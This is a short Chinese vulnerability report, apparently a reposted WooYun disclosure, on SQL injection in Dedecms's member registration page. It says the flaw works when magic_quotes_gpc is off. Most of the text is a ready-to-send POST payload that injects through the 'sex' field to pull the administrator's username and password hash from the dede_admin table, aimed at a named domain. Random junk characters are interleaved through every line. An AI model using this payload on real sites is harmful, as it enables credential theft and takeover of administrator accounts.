漏洞类型: SQL注射漏洞
" D8 i; \3 }" g+ c: Z" P1 O简要描述:
* w4 `+ b. R/ W" U( V
/ n- J$ F( n" J& K需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
. c! N/ Z. h' ]原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.* G* |% v2 g* p0 y; A/ L. y
详细说明:跟这个漏洞! X& w( m* z) \2 E" n# [
6 e" v2 D% S! I# I. I0 I8 ~
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
7 B2 Q8 k! |* U9 J2 h是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.* C1 u& A! [/ u7 B* X) N
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
# B# V4 g8 ^5 ~2 L: g/ T* z5 I
" k. v# x2 E7 ~www.political-security.com/member/reg_new.php
+ k) R% H. J8 d
. e- K' E$ _( S1 ]/ cPOST
& X# E0 Z) { U+ S/ \& _
* V. p% ^& o# `- Idopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
# c- ^/ a3 v+ Y, ^userid=c4rp3nt3r&uname=c4rp3nt3r
7 ]7 ~2 t0 p$ T&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss2 j/ r* R1 `* Q+ j! M+ }5 L
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
, C+ k5 g: K+ G, O(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
7 t* F+ h W4 I* i( ]9 k2 d%00&vdcode=glos&agree= |